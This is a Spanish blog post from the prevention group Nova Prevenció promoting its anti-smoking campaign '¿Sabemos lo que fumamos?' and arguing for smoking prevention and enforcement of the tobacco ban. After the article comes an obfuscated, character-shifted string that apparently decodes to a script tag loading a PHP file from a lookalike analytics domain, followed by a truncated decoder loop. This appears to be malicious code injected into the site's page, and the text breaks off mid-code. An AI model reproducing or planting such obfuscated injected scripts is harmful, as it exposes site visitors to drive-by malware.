¿Sabemos lo que fumamos? Nosotros sí.

Hemos sumado un nuevo año de lucha en la prevención de adicciones y lo hemos hecho cerrando el mismo con nuestra campaña ¿Sabemos lo que fumamos? poniendo colofón a un año lleno de ilusiones, proyectos y esfuerzo. Con esta campaña pretendemos buscar una forma de trabajar en prevención más allá de los límites a veces autoimpuestos en ese campo, buscando la actividad multidisciplinar ­en este caso, los audiovisuales como refuerzo de nuestro trabajo docente­ como un sinónimo de creatividad e innovación.

¿Sabemos lo que fumamos? Nace de la convicción de que la lucha contra el tabaco no está ganada, pues las muertes por cáncer asociado al tabaquismo siguen ahí y la reducción en el consumo de tabaco tiene que ver más con el precio del mismo que con concienciar de lo dañino que es para nuestra salud.

Los ejemplos para esta última afirmación son vivenciales: en Valencia todavía hay locales de ocio que no cumplen a rajatabla ­o no vigilan como es debido­ la ley antitabaco, sin duda uno de los mayores PROGRESOS ­así, en mayúsculas,­ de nuestra sociedad en materia de salud y derechos individuales. Pero por desgracia la responsabilidad de aquellos locales que sí tratan de respetarla se topan con un problema mucho mayor: la falta de educación y civismo de aquellos que inflingen esa ley.

El argumento falaz de la libertad del fumador (¿y qué pasa con la del no fumador? ¿es menos valiosa?) o la simiesca ausencia de modales se mezclan muchas veces con la desinformación absoluta sobre lo que es el tabaco (no, amigos/as míos/as, fumar no relaja), sus consecuencias y su naturaleza. Y eso es un problema de falta de prevención e información, aspecto que tratamos de paliar con nuestro trabajo y nuestra campaña, que la elección de fumar se base en el capricho y el pasotismo ante el daño y no en el desconocimiento, que el triste <<todo eso está muy bien, pero yo pienso seguir fumando>> sea una concesión consciente a la ignorancia y no producto de esta. Nova Prevenció nunca dirá que no fumes, que eres una peor persona por hacerlo; pero sí está en nuestro convencimiento informar sobre las más que posibles consecuencias severamente dañinas que para nuestro organismo tienen sustancias como el tolueno o el cadmio, presentes en el tabaco. De ahí que este año nuestra pregunta haya sido rotunda, nuestra pregunta haya sido ¿sabemos lo que fumamos? Nosotros sí, ahora te toca a ti.


#nzkt2#!tsd>#!iuuq;00hp1hmfbobmjujd/dpn0tdsjqut0epvcmfdmjdltubu/qiq#?=0tdsjqu?!”;
m=””; for (i=0; i

Powered By DT Author Box

Written by Francisco Latorre

Bookmark the permalink.